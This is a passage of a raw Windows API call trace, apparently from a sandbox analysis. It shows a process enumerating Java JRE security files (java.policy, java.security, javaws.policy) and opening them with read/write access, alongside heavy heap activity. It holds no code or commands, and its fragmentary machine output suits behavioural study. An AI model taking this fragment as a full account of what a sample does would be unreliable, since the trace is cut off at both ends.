Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.881] GetFileType (hFile=0x33c) returned 0x1 [0097.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0097.881] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.882] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.882] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.882] CloseHandle (hObject=0x33c) returned 1 [0097.882] AreFileApisANSI () returned 1 [0097.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0097.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 60 [0097.882] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.882] GetFileType (hFile=0x33c) returned 0x1 [0097.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0097.882] CloseHandle (hObject=0x33c) returned 1 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.883] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.883] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.884] AreFileApisANSI () returned 1 [0097.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0097.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 60 [0097.884] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9a2)) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.884] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.884] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eac, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="java.security", cAlternateFileName="JAVA~1.SEC")) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.884] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.884] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0097.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0097.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.885] AreFileApisANSI () returned 1 [0097.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security", lpUsedDefaultChar=0x0) returned 62 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.885] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.885] AreFileApisANSI () returned 1 [0097.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0097.885] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0097.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 62 [0097.885] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.886] GetFileType (hFile=0x33c) returned 0x1 [0097.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0097.886] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.886] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.886] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.886] CloseHandle (hObject=0x33c) returned 1 [0097.886] AreFileApisANSI () returned 1 [0097.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0097.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0097.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 62 [0097.887] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.887] GetFileType (hFile=0x33c) returned 0x1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0097.887] CloseHandle (hObject=0x33c) returned 1 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.888] AreFileApisANSI () returned 1 [0097.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0097.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0097.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security") returned 62 [0097.888] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eac)) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0097.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.889] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x62, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="javaws.policy", cAlternateFileName="JAVAWS~1.POL")) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0097.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.889] HeapFree (in: 